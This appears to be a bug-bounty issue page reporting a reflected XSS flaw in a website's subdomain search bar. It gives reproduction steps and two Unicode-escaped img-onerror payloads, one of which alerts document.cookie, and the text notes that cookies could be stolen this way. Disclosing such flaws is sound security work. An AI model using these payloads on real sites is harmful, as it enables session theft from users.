BLT Issue - Reflected XSS. Steps :First open the website in any browser like chrome or Firefox.Navigate to the search bar where we search subdomain and inject the payload.Payload I:\u002D\u0022\u003Cimg src\u003Dx onerror\u003Dalert(\u0022xss\u0022)\u003E\u0022.In similar way users cookies can also be stolen using this payload Payload II:\u002D\u0022\u003Cimg src\u003Dx onerror\u003Dalert(document.cookie)\u003E\u0022

Reflected XSS. Steps :First open the website in any browser like chrome or Firefox.Navigate to the search bar where we search subdomain and inject the payload.Payload I:\u002D\u0022\u003Cimg src\u003Dx onerror\u003Dalert(\u0022xss\u0022)\u003E\u0022.In similar way users cookies can also be stolen using this payload Payload II:\u002D\u0022\u003Cimg src\u003Dx onerror\u003Dalert(document.cookie)\u003E\u0022

Tweet GitHub Link

To comment, please sign in.

Anon1337

Total Points = 260

Issues Reported: 1

Browser Version: 84.0.4147

Operating System Linux

Added On

Aug. 29, 2020, 3:04 a.m.

Bug Type

Functional

Submitted

Independently

OS Version:

Unknown